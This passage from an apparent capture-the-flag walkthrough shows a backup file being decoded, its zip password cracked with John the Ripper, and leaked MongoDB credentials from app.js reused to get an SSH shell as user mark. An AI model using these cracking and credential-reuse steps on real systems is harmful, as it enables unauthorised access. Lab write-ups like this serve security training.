3 :3000 login

# there is a backup file we can download as admin

$ file myplace.backup
myplace.backup: ASCII text, with very long lines, with CRLF line terminators
# looks like a long base64 string

$ cat myplace.backup | base64 -d > myplace.backup_decoded
$ file myplace.backup_decoded
myplace.backup.b64: Zip archive data, at least v1.0 to extract

# naming it properly
$ mv myplace.backup_decoded myplace.zip

# its password protected, cracking with john
$ john --wordlist=/usr/share/wordlists/rockyou.txt ziphash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
magicword        (myplace.zip)
1g 0:00:00:00 DONE (2021-09-21 10:46) 100.0g/s 19660Kp/s 19660Kc/s 19660KC/s sandrea..piggy!
Use the "--show" option to display all of the cracked passwords reliably
Session completed

# unzip successful
file: /var/www/myplace/app,js
[truncated]
const url         = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/myplace?authMechanism=DEFAULT&authSource=myplace';
const backup_key  = '45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474';

# ssh works for mark
mark@node:~$ whoami;id;hostname;uname -a
mark
uid=1001(mark) gid=1001(mark) groups=1001(mark)
node
Linux node 4.4.0-93-generic #116-Ubuntu SMP Fri Aug 11 21:17:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux